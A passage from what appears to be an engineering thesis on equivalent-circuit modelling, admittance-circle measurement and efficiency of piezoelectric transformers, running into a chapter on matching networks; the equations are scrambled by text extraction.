end-plated bar. The total length of HVPT-1 is equal to l S + l E . In order to have l S = l E [4], l S = 15 mm and l E =18 mm. The other way to simplify the analysis is to let Zo = Zo, in which case the cross-sectional areas have the following relationship: l l S E A A Y Y E S E D 11 33 , (2.12) where A E is the cross-sectional area of the end-plated bar and is equal to (h W); A S is the cross-sectional area of the side-plated bar and is equal to (h W). Although the cross-sectional area of HVPT-1 is uniform in shape, the assumption is still made to simplify the analysis of the equivalent circuit. Therefore some mismatch between the measured and calculated characteristics of HVPT-1 is expected. However, as long as the model is correct, the parameters of the electrical equivalent can be tuned by referring to the measurement data. The input admittance, Yin, of the longitudinal PT, obtained both from the resultant model and measurement data, is shown in Fig. 2.2 (b) when the output terminals of HVPT-1 are shorted. The calculated and measured input admittances of HVPT-1 are similar in shape, without any spurious vibrations, but the resonance frequencies are little different. This predicts that a better measurement technique needs to be developed to describe the characteristics of the PT more accurately. A MCAD program in Appendix B.1 is developed to determine the physical model of HVPT-1 under mismatch conditions. 15 2.2.2 Thickness extensional mode PT The sample adopted in this section is a 1:1 thickness extensional mode PT, which is developed in NEC device laboratory and is called LVPT-11. The construction of LVPT-11 is illustrated in Fig. 2.3 (a), and its model is composed of two identical model cells of the broad plate shown in Fig. 2.3 (b). Tables 2.3. and 2.4. show the material, dimensional, and piezoelectric properties of LVPT-11. Table 2.3. Material constants for LVPT-11. Constant Description Value 33 T Relative permittivity 211 33 S 33 33 2 1 S T t k ( ) 156 tan Dielectric tangent (%) 0.6 k t Electromechanical constant 0.52 Y 33 E Youngs modulus (10 10 N/m) 11.9 Y 33 D Y Y k D E t 33 33 2 1 1 ( ) (10 10 N/m) 16.08 g 33 Piezoelectric constant (10 -3 Vm/N) 25.5 h 33 h Y g D 33 33 33 ( x 10 10 ) 0.5423 Qm Mechanical quality constant 1200 Density (kg/m 3 ) 6900 Table 2.4. Dimensions of LVPT-11. Variable Description Value h Length of the PT (mm) 20 W Width of the PT (mm) 20 2 l Thickness of the PT (mm) 3.66 l S Length of the insulation layer 0.22 16 Vin Cd1 1 : Z 1 Z 1 Z 2 Vo Cd2 : 1 Z 1 Z 2 Z 1 Electrical equivalent circuit of a broad plate Electrical equivalent circuit of a broad plate (b) L o (a) (a) 1:1 BROAD-PLATE PT p p INPUT OUTPUT Insulation layer L o Fig. 2. 3. Construction of the thickness extensional mode PT (LVPT-11). (a) isolated type 1:1 broad-plated PT. (b) its equivalent circuit. The input and output part of LVPT-11 are identical and the analysis of the PT is focused on input part only. Because it is so broad that the strain is zero around the circumference of the PT where the support points should be located. But technically it is difficult to do so. An alternate way is to support it around four corners on the bottom side with four small elastic material which will not hinder the mechanical vibration. 17 Vout Cd2 1 : N Vin Cd1 R L C L = 0.47 mH C = 30.7 pF R = 3.07 Cd1 = 434 pF Cd2 = 434 pF N = 1 (a) (b) Yin Vo = 0 Frequency (MHz) 1.3 1.32 1.34 1.36 0 0.1 0.2 0.3 1.33 1.35 1.31 Physical model in (a) Measured from HP 4194 Fig. 2. 4. Physical model of LVPT-11 and its input admittance characteristics. The measured input admittance is shown in dark line. Both input admittance characteristics are obtained when the output terminals are shorted. Because there are a lot spurious vibrations near the resonant frequency from the measurement, the efficiency and voltage gain of the PT will be decreased. The parameters of the model depicted in (a) can no longer duplicate the unwanted spurious vibration. Because there is an insulation layer installed between the input and output parts, the measured mechanical loss is five times higher than the theoretical loss which can be corrected by admittance circle measurement technique. 18 The complete model of LVPT-11 is shown in Fig. 2.4 (a). The equations to calculate the parameters of LVPT-11 is also summarized from Appendix A and listed below: L L o Volume of the PT 8 2 2 ' ; (2.13) C W h Y D ' 2 2 1 4 l ; (2.14) R Z Q o m 4 2 ' ; (2.15) Cd W h T o 1 33 l ; (2.16) h W c g D D l 33 33 33 ; (2.17) Z Y h W o D 33 ; (2.18) L Cd o o 1 1 2 ; (2.19) and the dielectric losses can be estimated as Rcd Cd o 1 1 1 tan (2.20.a) Rcd Cd o 2 1 2 tan (2.20.b) The turns ratio N = 1 and Cd1 = Cd2. From Fig. 2.4 (b)., the calculated input admittance of the model is verified with the measured model obtained from the impedance analyzer. A lot of spurious vibrations occur around the resonant frequency of the measured input admittance because of the material properties [16]. The efficiency of the PT will decrease around the frequencies of the spurious vibrations. To utilize this type of PTs correctly, the characteristics of the spurious vibrations must be simulated and rebuilt in the model. So the physical model of the PTs is too simplified to employ under those circumstances, and it needs to be modified for the simulation purposes. A MCAD program presented in Appendix B.2 is developed to calculate the electrical equivalent of HVPT-1 from measurement results. 19 2.3 Measurement of Electric Equivalent Circuit of the PT Since the physical model mentioned earlier can not duplicate the characteristics of the thickness extensional mode PTs, it is very important to develop a measurement technique to verify the parameters of the improved physical model. To get a closer insight into the PTs, first, a measurement method is proposed to obtain the parameters of the equivalent circuits which is similar to the equivalent circuit of a quartz. A procedure to measure and calculate the equivalent circuit of the PTs is given in detail. 2.3.1 Characteristics of the PT Besides the admittance characteristics, the information about the voltage gain and efficiency of the PT is essential to its performance as a transformer. Figure 2.5. shows the general gain characteristics of a PT with 1-M load termination, and three peaks are observed. Usually, the left peak shows the fundamental mode or half-wave mode operation. The full-wave mode operation is in the center, and the third-wave mode is on the right. It is not necessary that the maximum voltage gain occur in the full-wave mode operation. However, each peak of the voltage gain for a specified load condition occurs at the mechanical resonant frequency, f S . Exact modes of operation can be obtained by calculating v f sound o where v sound represents the velocity of the mechanical vibration in the PTs and is the length of the PTs 2.3.2 Admittance Circle Measurements Generally, the equivalent circuit of the PT is a distributed network rather than a single linear resonant circuit valid only near the fundamental resonance frequency, fs. The impedance characteristics [4,5,8] of the PT with one port shorted are similar to those of a quartz, shown in Fig. 2.6 (a). So it is possible to obtain an empirical model for the PTs by borrowing the model of the quartz. To decide the parameters of the electrical equivalent circuit shown in Fig. 2.2. or 2.4., the measured conductance and susceptance are plotted in G-B axes and result in an admittance circle. Figure 2.6 (b). shows the admittance circle for the electrical equivalent circuit of a PT, when one of the output ports of the PT is shorted, and the critical frequencies are defined as f +45 : frequency at +45 o from the origin, (G,B)=(0,0) ; fm: frequency at maximum admittance ; fs: series resonance frequency, 2 1 fs LC s ; (2.21) fr: resonant frequency, susceptance = 0 ; f -45 : frequency at -45 o from the origin, (G,B)=(0,0) ; fa: antiresonance frequency, susceptance = 0 ; 20 Vin Vo fs HP 4194 Input signal Ref. Test Vin Vo PT Operation frequency Fig. 2.5. Voltage gain characteristics of the PTs. From the measured fs and velocity of sound Vsound, wave length = Vsound/fs. Accordingly, mode of operation for each peak can be determined. Each mode of operation can be represented by a serial R-L-C branch and decided by the admittance circle measurement. 21 Yin = G + jB R L C Cd1 (a) G B f+45 fs f-45 G MAX 1 R fa fr fm fn Increased Frequency fp 45 o 45 o Freq. (b) Fig. 2. 6. Admittance circle measurements. The measurement reseults are employed to calculate the parameters of the equivalent circuit: Cd1, R, L, and C when one port of the PT is shorted. In the same manner, when the other port is shorted, another set of parameters are derived. As a result, Cd2 and turns ratio N of the PT are obtained. 22 fp: parallel resonance frequency, ( ) 2 1 1 fp L C Cd p ; (2.22) fn: frequency at minimum admittance ; If the mechanical loss, R, is very small, the critical frequencies, fm, fs, and fr, are merged and so are the frequencies fn, fp, and fa. Except fp, the other five frequencies are easy to obtain from impedance measurement. The only information provided to locate fp in the admittance circle is that the phases of the total admittance of the PTs are identical at fs and fp. To extract the parameters of the PTs, some parameters need to be measured. At a very low frequency, for example: 1 kHz [8], the impedance of L is almost zero. If admittance of capacitor, C, is larger than the 1/R, only an intrinsic capacitor appears in the input of the PT with a shorted output. The total input capacitance, measured from input port of the PTs, is C Cd C T + 1 , (2.23) and Cd C s p T 1 2 2 , (2.24) L C s 1 2 , (2.25) R G MAX 1 . (2.26) Frequencies fs and fp are the key frequencies to calculate the values of L and C in the mechanical branch in the model. It is relatively easy to measure the series-resonance frequency, fs. Unfortunately, parallel resonance frequency, fp, is very difficult to measure in the admittance circle; therefore, an alternative method to decide L and C by using other critical frequencies is developed. Resonance and antiresonance frequencies are calculated in Appendix C to give ( ) r LC R L Cd LC 2 2 1 1 1 1 1 + _ , + , (2.27) ( ) a LC C Cd R L C Cd LC C Cd 2 2 1 1 1 1 1 1 1 + + _ , _ , , (2.28) where 23 R L Cd 2 1 . (2.29) Assume << 1, which means R LC Cd C 2 1 1 << , (2.30.a) ( ) s RC C Cd C 2 2 1 << , (2.30.b) Cd C Q m 1 2 << . (2.30.c) Because the magnitude of Qm usually falls between 300 to several thousands for the piezoceramics, (2.10) holds and =0 in (2.7) and (2.8). When dividing (2.7) by (2.8), Cd1 is calculated to be Cd C r a T 1 2 2 (2.31) which is identical to (2.4). However, the parallel-resonant frequency fp can be measured by measuring the impedance of the PT instead of admittance of the PT. The parallel-resonant frequency occurs when the real part of Z reaches as its maximum, where the resistive loss represents the mechanical and dielectric losses of the PT. Other than using (fr, fa) and (fs, fp) to calculate Cd1, it is also possible to use fm and fn to do the calculation [5,8]. Figure 2.7 (a). shows equivalent circuit and calculated parameters of the PTs when input port is shorted. In a similar manner, Fig. 2.7 (b). shows the equivalent circuit and its parameters by shorting the input of the PT and transferring the mechanical branch to the secondary side of the PT. As usual, C T2 is measured at 1 kHz. Another set of equations to calculate the parameters of the equivalent circuit become C Cd C T N 2 2 + ; (2. 32) Cd C r a T 2 2 2 2 2 2 ; (2.33) C C Cd N T 2 2 ; (2.34) L C N s N 1 2 2 ; (2.35) 24 N L L N ; (2.36) R L C Cd1 C = Cd1 + C T Cd1 = C T r 2 2 a R = G MAX 1 L = C 1 2 s C = C - Cd1 T (a) Cd2 R L C N N N Cd2 = C T2 r2 2 2 a2 C = Cd2 + C T2 N R = G MAX2 N N 2 C = C - Cd2 T2 N 1 2 s2 C N L = N N L L N (b) Fig. 2. 7. Derivation of parameters of PT model by admittance circle measurement techniques. (a) when output port is shorted. (b) when input port is shorted. 25 where C N and L N are capacitor and inductor reflected to the secondary side, and N is the turns ratio. Another method to calculate the parameters of the equivalent circuit was adopted in [35], and the main equations are listed below: R B MAX 1 ; (2.37) Cd B S S 1 ; (2.38) C R f f f f + + 1 2 45 45 45 45 - ; (2.39) L R f f + 2 1 45 45 - . (2.40) This method is still valid when the admittance circle does not intersect G axis in the G-B plot. Again, the disadvantage is that it is very difficult to identify f +45 and f -45 in an arbitrary admittance circle, which might not be a pure circle at all. Therefore, a curve-fitting method needs to be used to get an ideal circle from the measurement data. Compared to these two admittance circle techniques, the former measurement is easier to perform and has been employed to demonstrate the feasibility later. 2.3.3 Dielectric loss Due to the high-Q characteristics in the R-L-C branch of the equivalent circuit for the PT, the theoretical efficiency of the PT is relatively insensitive to the load when it is tested near fs and terminated with resistive load. As a matter of fact, the efficiency of the PTs is highly dependent on the load [21]. The disagreement between the model and measurements probably results from the nonlinear effect of the dielectric loss in the input and output intrinsic capacitors of the PTs. To model the PT more accurately, two resistors have been added to the input and output intrinsic capacitors of the PTs, respectively. The dielectric loss can be estimated by the dielectric loss factor tan of the input and output intrinsic capacitors Cd. Rd fr Cd 1 2 1 tan , (2.41) where Rd is the parallel resistance representing the dielectric loss of the PT. Taking LVPT- 11 as an example, Cd1 = 470 pF, tan = 0.006, and fr = 1.33 MHz. The calculated resistance of Rd1 is 42 k. Although a large parallel resistance at the input or output terminals of a two-port network indicates a small loss, it was demonstrated by an empirical experiment that dielectric losses of the PTs are not negligible because of the nonlinearility under high-power operations. 26 2.4 Complete Model of the Sample PTs In the following chapters, two PTs are employed in different converter applications. They are different samples from those studied in section 2.2. The first one is a step-up PT HVPT-2, whose step-up ratio is 1:9 when it is terminated with a 200-k resistive load. The other one is a step-down PT LVPT-21 which provides a 2:1 step-down ratio and is manufactured by NEC. In order to proceed to design the converter with the PTs, the voltage conversion ratio and efficiency of the converter employing PTs have to be calculated according to different converter topologies and loads, including linear and nonlinear loads. Therefore, it is very important to develop a method to modify the electrical equivalent circuit of the physical model derived in section 2.2 around resonant frequency. To validate the correctness of the complete PT models, the input admittance characteristics of the PTs are carefully tuned to agree with those of measurement results. Then the calculated voltage gain and efficiency of the PT models are compared with the experimental results for HVPT-2 and LVPT-21, respectively. 2.4.1 Longitudinal mode PT : HVPT-2 2.4.1.1 Complete Model of HVPT-2 The general characteristics of HVPT-2 are listed below: Type : Rosen type (single layer, no isolation), Power handling : 3 - 6 Watts, Series resonant frequency : about 73 kHz (no load), Step up ratio : 1:9 when it is terminated with a 200 k resistor, and Size : ( ) 50 8 15 . , L W T all in mm . Figure 2.8 (a). illustrates the G-B plot of HVPT-2 with output terminals shorted. The electrical equivalent circuit of HVPT-2 is calculated by extracting useful parameters via the measurement data such as fs, fr, fa, and Gmax, and is drawn in Fig. 2.8 (b). Figure 2.8 (c). shows the calculated and measured input admittance of HVPT-2. Because the curves of calculated and measured input admittances coincide with each other, there is no need to improve the model any further. MCAD programs are used to determine the equivalent circuits of HVPT- 2 as well as LVPT-21 and are listed in appendix D. 27 Vin Vo Cd2 7.33 pF 1 : 5.16 Cd1 811 pF 68.5 149.2 mH 37.7 pF (b) (a) Conductance (G) Susceptance (B) fs = 67054 Hz 0 0.004 0.008 0.012 0.016 -0.01 -0.005 0 0.005 0.01 Yin Vo = 0 62 kHz 64 kHz 66 kHz 68 kHz 70 kHz 72 kHz 0.002 0.006 0.01 0.014 (c) Fig. 2. 8. Admittance circle measurement and the electrical equivalent circuit of HVPT-2. (a) admittance circle measurement. (b) model of HVPT-2. (c) calculated and measured input admittances. For longitudinal PTs, the model, originated from their physical modeling around fs, can duplicate their characteristics faithfully when admittance circle measurement technique is adopted to calculate parameters of the equivalent circuits. 28 Rload HVPT-2 + VO - IO IIN + VIN - Amp. (a) (b) (c) 68 kHz 0 4 8 12 98.2 199 282 474 605 Rload (k) 66 kHz calculated voltage gain measured voltage gain VGAIN 70 kHz 72 kHz 74 kHz 76 kHz 0.88 0.92 0.96 calculated efficiency 100 k 300 k 500 k Rload measured efficiency Fs = 68.5 kHz Fig. 2. 9. Voltage gain and efficiency of HVPT-2. (a) test setup. (b) measured and calculated voltage gain. (c) measured and calculated efficiency. The black solid squares in (b) indicate that the measured peak gains agree with calculated peak gains under different Rload. Moreover, the calculated and measured efficiency curves are similar with 1% ~ 2% difference. It demonstrates the accuracy of the model for HVPT-2. 29 2.4.1.2 Experimental Verifications To verify the input admittance and voltage gain of the PT under high-power test, the same test-setup employing impedance analyzer under signal power level is followed. Additionally, the input reference source of the impedance analyzer is first amplified before connecting to the device under test, as shown in Fig. 2.9 (a). Voltage gain and efficiency are defined as Voltage gain V V rms V rms GAIN o IN ( ) ( ) ; (2.42) Efficiency I rms Rload V rms I rms o IN IN ( ) ( ) ( ) cos 2 ; (2.43) V rms I rms Rload o o ( ) ( ) , (2.44) where = angle between V IN and I IN . Figure 2.9 (b). shows the frequency vs. voltage-gain curves measured for several load resistances. It is important to notify that for each load resistance, the maximal voltage gain matches a designated operating frequency. Figure 2.9 (c). illustrates the calculated and measured load-efficiency curves. Theoretically, the load vs. efficiency curves of the HVPT should not change much when the operating frequency is the running parameter and stays around the series resonance frequency, fs. However, from the measurement data, several interesting results have been observed. The maximal efficiency always occurs when the resistive load equals the output impedance of the HVPT, approximately 330 k. The efficiency of the PT decreases when the operating frequency increases. The lower the load resistance, the lower the efficiency. The last two effects are due to the increased dielectric loss when increases or reactive power increases. The other important factor which will affect the efficiency of an HVPT is its support points. For a full-wave mode operation, when the support points are moved from the nodes where displacement of the HVPT is zero, the efficiency of the HVPT drops at least 5%. Due to high efficiency of the HVPT, the heat generation is insignificant for low-power applications, and it is possible to hold the HVPT in a box and to support it firmly at nodes. In such a way, the HVPT can be treated as a step-up device with input and output electrodes and becomes a promising component for automation. 30 2.4.2 Thickness Extensional PTs : LVPT-21 2.4.2.1 Two-Port Network Representation of LVPT-21 Two-port network representation of LVPT-21 is certainly the best empirical model. It is easy to convert to any type of linear two-port parameters from S parameters measured by network analyzer, because the operating frequency of thickness extensional PTs is in the MHz range, and their input and output impedances are close to 50 . On the other hand, the output impedance of the longitudinal PT is within hundred kilo . It is inappropriate to measure the two port parameters of the longitudinal PT in the 50- system. Usually, the input admittance of the longitudinal PT is measured by impedance analyzer, and it is also true for the thickness extensional PT. However, with the help of two-port parameters, the efficiency and voltage gain of the PTs can be calculated directly and they provide useful methods to interconnect the peripheral circuits of the PTs, such as power amplifiers and load networks. Accordingly, the performance of the model can be verified with two-port parameters in low-power operation and with direct measurement in high-power operation. To perform the admittance circle measurement at high-frequency operation, Y parameters are selected. Y 11 is the input admittance with one end shorted and is the information needed by admittance circle measurement technique. With Y parameters, the voltage gain and efficiency of the two-port network are Voltage gain V Y Y Y GAIN L + 21 22 and (2.45) [ ] [ ] Efficiency = = Pout Pin V Y Y GAIN L IN 2 Re Re , (2.46) where Y L is the load admittance of the PT and input admittance with arbitrary load is Y Y Y V IN GAIN + 11 12 , (2.47) where input voltage of the PT is set to unity. 2.4.2.2 Complete Model of LVPT-21 The general characteristics of HVPT-2 are listed below: Type : Thickness extensional mode (multilayer layers, isolated input and output), Power handling : 10 - 15 Watts, Series-resonant frequency : about 1.88 MHz (shorted at one end), Step down ratio : 2:1 when it is terminated with an 8- resistor, and Size : ( ) 20 20 2 L W T, all in mm . Figure 2.10 (a). illustrates the G-B plot of LVPT-21 with one end shorted. Besides the fundamental admittance circle whose series-resonant frequency is fs, there are three small circles, 31 having series-resonance frequencies, f1s, f2s, and f3s. The electrical equivalent circuit of LVPT- 21 characterized by the fundamental circle is shown in Fig. 2.10 (b). As a result, the calculated input admittance curve with one end shorted doesnt agree with that of the measurement as shown in Fig. 2.10 (c). The series-resonant frequency of the PT will move to higher operating frequencies, as shown in Fig. 2. 9 (b), when the load resistance increases. Moreover, the unwanted spurious vibrations will affect the efficiency of the PT around their resonance frequencies. To obtain a useful model of LVPT-21, the characteristics of calculated admittance from the electrical equivalent circuit must agree with those from measurement results for a wide frequency range. Therefore, those small admittance circles need to be modeled and can be represented as additional series R-L-C branches in parallel with the fundamental branch. From the G-B plot in Fig. 2.10 (a), the admittance circles having the resonant frequencies fs1, fs2, and fs3 do not intercept with the G-axis. To calculate the parameters of these spurious vibrations, (2.37) to (2.40) are employed. Although those small admittance circles are not perfect circles[35], f -45 and f +45 are replaced with the frequencies, where maximum and minimum susceptances occur, respectively. The measured data for constructing three small admittance circles is presented in Fig. 2.11 (a). The final complete model of LVPT-21, shown in Fig. 2.11 (b), is tuned to curve-fit the measured curve of input admittance illustrated in Fig. 2. 11 (c). 2.4.2.3 Experimental Verifications Employing a similar test setup as the one shown in Fig. 2.9 (a)., Fig. 2.12 (a) shows the calculated voltage-gain curve of the model with the fundamental branch only and the calculated voltage-gain curve according to the measured Y parameters. Apparently, a lot of information is lost in the former curve. When the complete model for LVPT-21 is adopted, both the calculated voltage-gain curves and measured high-power curve are shown in Figs. 2.12 (b) and (c) with 7.5- and 20- load resistors, respectively. The error between the measured high-power V GAIN and calculated V GAIN according to the measured Y parameters is within 2.5 %. This confirms the accuracy of the model and the high-power voltage-gain measurement. At the same time, the calculated voltage-gain curve of the complete model has the similar shape as the measured curve. Figure 2.13 (a). illustrates the two calculated efficiency curves of LVPT-21 when it is modeled with the fundamental mode only. Three efficiency curves, shown in Fig. 2.13 (b)., for LVPT-21 terminated with a 20 ohm resistor are measured under high-power (2.5 Watts), calculated according to the measured Y parameters, which is drawn in dark black color, and generated from the complete model shown in Fig. 2.11 (a). Figure 2.13 (c) illustrates the other three efficiency curves when the load resistance of LVPT-21 is 7.44 ohm. From Figs. 2.13 (b) and (c), the efficiency of LVPT-21 calculated from the complete model can predict the measured efficiency correctly within a wide frequency range. It can be observed that the efficiency of the PT is load-dependent. How to operate the PT efficiently becomes an important issue. Therefore, in the next chapter, the objective is to use the complete models for HVPT-2 and LVPT-21 as examples to find out the optimal load for the longitudinal and thickness mode PTs. 32 Vin Vo Cd2 9.52 nF 1.91 : 1 Cd1 2.61 nF 2.23 33.4 H 219.1 pF (b) (a) (c) Conductance (G) Susceptance (B) 0.1 0.2 0.3 0.4 0.5 - 0.2 - 0.1 0 0.1 0.2 0 fs fs1 fs2 fs3 fs1= 1835000 Hz fs = 1860250 Hz fs2 =1892374 Hz fs3 =1943246 Hz 1.85 MHz 1.95 MHz 0.1 0.2 0.3 0.4 1.9 MHz 2 MHz YIN Vo = 0 Basic model in (b) Measured from HP 4195 fs1 fs fs2 fs3 1.8 MHz Fig. 2. 10. G-B plot and basic model of LVPT-21. (a) admittance circle measurement when Vo = 0. (b) basic model of LVPT-21. (c) calculated and measured input admittance. The spurious vibration near fs is caused by the electromechanical coupling coefficient k31 which results ins unwanted vibration perpendicular to the thickness direction. For thickness mode PTs, the basic model cannot predict the admittance characteristics of LVPT-21. 33 (a) Vin Vo Cd2 9.52 nF 1.91 : 1 Cd1 2.61 nF 2.23 36.8 H 219.1 pF 6.47 586 H 14.6 pF 13.81 440 H 12.1 pF 57.8 1.2 mH 5.5 pF fs1 = 1835000 fs2 = 1892374 fs3 = 1943246 0.1 0.2 0.3 0.4 fs2 fs3 1.85 MHz 1.9 MHz 1.95 MHz 2 MHz 1.8 MHz (b) - 50 0 50 100 1.85 MHz 1.9 MHz 1.95 MHz 2 MHz 1.8 MHz Phase angle ( Degree ) (c) Complete model in (a) Measured from HP 4195 YIN Vo = 0 fs1 Fig. 2. 11. Complete model of LVPT-21 and its characteristics. (a) complete model of LVPT- 21. (b) calculated and measured input admittance. (c) calculated and measured phase angles of input admittance. 34 Reference voltage gain calculated according to two-port parameters. VGAIN VGAIN 0.3 0.4 0.5 0.6 1.85 MHz 1.9 MHz 1.95 MHz 2 MHz 1.8 MHz VGAIN model in Fig. 2.10 (b) Rload = 7.5 (a) (b) (c) 0.4 0.6 1.95 MHz 2 MHz 1.9 MHz 1.85 MHz 0.3 0.5 Rload = 7.5 complete model measurement 0.4 0.6 0.8 1 1.95 MHz 2 MHz 1.9 MHz 1.85 MHz Rload = 20 complete model measurement Fig. 2. 12. Experimental and theoretical voltage gain of LVPT-21. (a) fundamental model (b) Rload = 7.5 . (c) Rload = 20 . The higher the load resistance, the higher the voltage gain. Since the voltage-gain curves are monotonous only in several piecewise regions, constant-frequency control is preferred to control voltage gain of LVPT-21. 35 (a) 1.85 MHz 1.9 MHz 1.95 MHz 2 MHz 1.8 MHz Rload = 20 0.4 0.6 0.8 Reference voltage gain calculated according to two-port parameters. (b) (c) 0.4 0.6 0.8 1.95 MHz 2 MHz 1.9 MHz 1.85 MHz Rload = 7.44 complete model measurement 0.4 0.6 0.8 1.95 MHz 2 MHz 1.9 MHz 1.85 MHz Rload = 20 complete model measurement model in Fig. 2.10 (b) (a) (b) (c) Fig. 2. 13. Experimental and theoretical efficiency of LVPT-21. (a) fundamental model (b) Rload = 20 . (c) Rload = 7.44 . When LVPT-21 is terminated with resistive loads, the efficiency in (b) is lower than that in (c). Therefore, a method is developed to obtain the optimal load where the efficiency of the PT is maximized. 36 2.5 Summary and Conclusion The complete models for longitudinal and thickness mode PTs are verified from their input admittance characteristics with one end shorted and performance characteristics including voltage gains and efficiencies. Both complete models have proved their usefulness on component level for simulating their voltage gains and efficiencies via electrical equivalent circuits. The model for the longitudinal PT is simple and can be derived from its fundamental branch because of no additional spurious vibration around fs. However, the complete model for the thickness extensional PT is very complicated due to the unwanted spurious vibrations generated by the electromechanical coupling coefficient k 31 . Because there is not yet a good method to eliminate all unwanted spurious vibrations in manufacturing, including spurious vibrations in the model is necessary for simulation purposes. As a result, several bands of operating frequencies can be determined, and the efficiency of the PTs can be optimized over one of the frequency bands. A study of electrical equivalent circuits for the PTs with regard to mechanical vibrations and related mechanical losses gives a better understanding of how the PTs work. The detailed derivation of models for the PTs is shown in Appendix A. This work suggests that it is possible to design a stacked PT with any desired transformer ratio for different applications by using a simulation tool. 37 3. Design of Matching Networks 3.1 Introduction From the characteristics of the PTs, it follows that the efficiency of the PTs is a strong function of load and frequency. Due to the large intrinsic capacitors, it is essential to add inductive loads to the PT [5] to obtain a satisfactory efficiency for the PT and amplifiers. It has been established in [40] that the power gain (or efficiency) of a two-port network (or the PT) is determined by its load termination and properties of the two-port network only. And so is the input impedance of the terminated two-port network. Figure 3.1 shows a complete block diagram of a dc/dc converter employing the PT. It is important to choose the design procedure so as to obtain the maximum efficiency of the converter. The algorithm for designing a PT converter or inverter is to calculate the optimal load termination, Y OPT , of the PT first so that the efficiency (power gain) of the PT is maximized. And then the efficiency of the dc/ac inverter is optimized according to the input impedance, Z IN , of the PT with an optimal load termination. The load resistance, R L , is decided according to the output specifications of the dc/dc converter. Then the equivalent resistance, R EQ of the nonlinear rectifier load is obtained for different rectifier circuits. For a given PT, an optimal termination, Z OPT , is calculated and decided by the power-flow method. Obviously, R EQ will not equal Z OPT unless the PT is designed for this application. With the help of an output matching network (OMN), the optimal termination of the PT matches the equivalent resistance of the rectifier circuit. Designing the input matching network (IMN) depends on two parameters. One is the input impedance, Z IN , of the PT with an optimal load, which can be calculated directly. The other parameter is the output impedance, Z O , of the switching amplifiers, which is different from the usual 50 of regular radio-frequency amplifiers. Because the output impedance of the switching amplifiers is so low, the objective of the IMN is to alleviate the circulating current in the amplifiers and input of the PT. In other words, the IMN could be an inductive network designed to cancel the capacitive impedance seen at the input port of the PT. 38 R L R EQ PT : Piezoelectric Transformer Rectifier circuit Y L Y IN Output matching network PT Input matching network Fig. 3.1. Complete dc/dc converter with the PT and its matching networks. It is important to operate the PT efficiently and draw as much power as possible from the source amplifier. The design procedure for PT converters is to decide the optimal terminations YLOPT of the PT and to design the output matching network OMN accordingly. The efficiency of the dc/ac inverter is optimized according to the input admittance YIN of the PT with an optimal load termination. Therefore, the objective of the input matching network IMN is to reduce the circulating current between the PT and dc/ac inverter so that the efficiencies of both the PT and inverter are optimized and maximum power can be delivered to the load. In the beginning of this chapter, a unified method, or power-flow method, was discussed to obtain the best efficiency for both the longitudinal mode and the thickness extension mode PTs. Later, the output matching networks, input matching network, and load characteristics for the PTs are calculated. 3.2 Output Matching Networks The objectives of the output matching networks are to maximize the efficiency of the PTs and to reduce the reactive power flow in both input and output of the PTs. 3.2.1 Power Flow Method Using the two-port power flow model [40,41], the maximum efficiency of the PT is determined at the specific load condition. The power flow model exploits the relationships between input and output power in a linear two-port network. Instead of using two-port z, y, or h matrices, a 2D Cartesian coordinate system with L and M axes is adopted. The (L,M) coordinate system, or L-M plane, is defined around the neighborhood where the load admittance is a complex conjugate of the output admittance of the PT with an opened input port, Y 22 . Under 39 this condition, the input and output power of the PT can be easily calculated in the L-M plane, and show simple geometry in the L-M plane. By using the simple geometry of input and output power in the L-M plane, an intuitive method is developed to calculate the optimal load termination for the PTs. 11 y = 0.3602 + j 0.1908 21 12 y = 0.3588 + j 0.3242 22 y = 0.3641 + j 0.3038 y = 0.3602 + j 0.1908 PT Y IN Y L I Y V Y V 1 11 1 12 2 + I Y V Y V 2 21 1 22 2 + 1 I 1 V + V 2 I 2 + Y L Y IN Fig. 3. 2. Two-port network representation of PTs and the sampled Y parameters at fs. The Y parameters of the PT are converted from S parameters measured from the network analyzer and can represent accurate characteristics of the PT. A set of Y parameters is given at fs of a 1:1 acoustic filter transformer for quantitative discussion about the power flow method to decide the optimal YL. 40 3.2.1.1 Input Power Plane In order to illustrate how the power flow model works, the Y parameters for an 1:1 acoustic filter transformer are given at fs [19]. Usually, this method can calculate the efficiency of a two- port network at one frequency at a time and needs to be repeated at different frequencies to cover the operating frequency range of interest. Figure 3.2. shows the diagram of the two-port network and its notations, as well as the values for the Y parameters at fs. However, the choice of Y- parameter modeling is arbitrary, and the Y-parameters are transformed from the S-parameters of the PT which are measured from a network analyzer. The linear two-port network is represented by Y-parameters in (3.1): I Y V Y V I Y V Y V 1 11 1 12 2 2 21 1 22 2 + + , . (3.1) V 2 is formulated as a function of L and M [40] in (3.1): [ ] V V Y I V Y Y Y L jM 2 1 21 2 2 22 21 22 2 + Re ( ) , (3.2) which is derived from (3.1) directly, and Y I V L 2 2 . (3.3) When (L,M) = (1,0), Y L is equal to the complex conjugate of Y 22 . Due to linearity, let V 1 =1 + j0. The normalized input power ,Pin, shown in Fig. 3.3. is expressed as: [ ] V V Y I V Y Y Y L jM 2 1 21 2 2 22 21 22 2 + Re ( ) , (3.3) [ ] Pin(L, M) V 2 Re Y g aL bM 2g 1 IN 11 22 , (3.4) where [ ] Y I V Y Y V Y Y Y Y L jM IN + + + 1 1 11 12 2 11 12 21 22 2Re ( ) , (3.5) and Y Y a jb and Y g jb ij ij ij 12 21 + + . (3.6) 41 Pin ( L,M ) 0.5 0 2 1 0 0 1 -1 M L [ ] Pin (L, M) V 2 Re Y g aL bM 2g 1 IN 11 22 Y Y a jb and Y g jb ij ij ij 12 21 + + AB L jM + 2g Y 22 22 + Y L Fig. 3. 3. Input power plane in the L-M plane. Line AB is the contour of zero input power in the L-M plane. The line function is aL - bM -2 g11 g22 = 0 and the slope is a/b. The magnitude of the three-dimensional plot is calculated according to y parameters at fs of the 1:1 acoustic filter transformer used as an example. 3.2.1.2 Output Power Plane The normalized power delivered to the output port of the PT, Pout, can be expressed in the L-M plane as: [ ] Pout V Re Y V Re 2 2 L 2 2 1 ] 1 I V 2 2 , (3.7) where -I V Y 2g L jM 2 2 22 22 + + Y L , (3.8) 42 and Y L L L G (L, M) jB (L, M) + . (3.9) Substituting (3.8) into (3.7) yields [ ] Pout (L, M) Poo 1 (L 1) M 2 2 , (3.10) where Poo Pout (1,0) Y 4g 21 2 22 . (3.11) Since the PT is a passive device, the input power, Pin, is always greater than the output power, Pout. The output power surface drawn in Fig. 3.4. forms a paraboloid centered at (L,M) = (1,0), where maximum output power occurs. 3.2.1.3 Maximal Efficiency Figure 3.5. shows the efficiency in 3D plot. It is very difficult to find an analytical solution for the maximal efficiency in the L-M plane. With the knowledge of the simple geometry for the input and output power 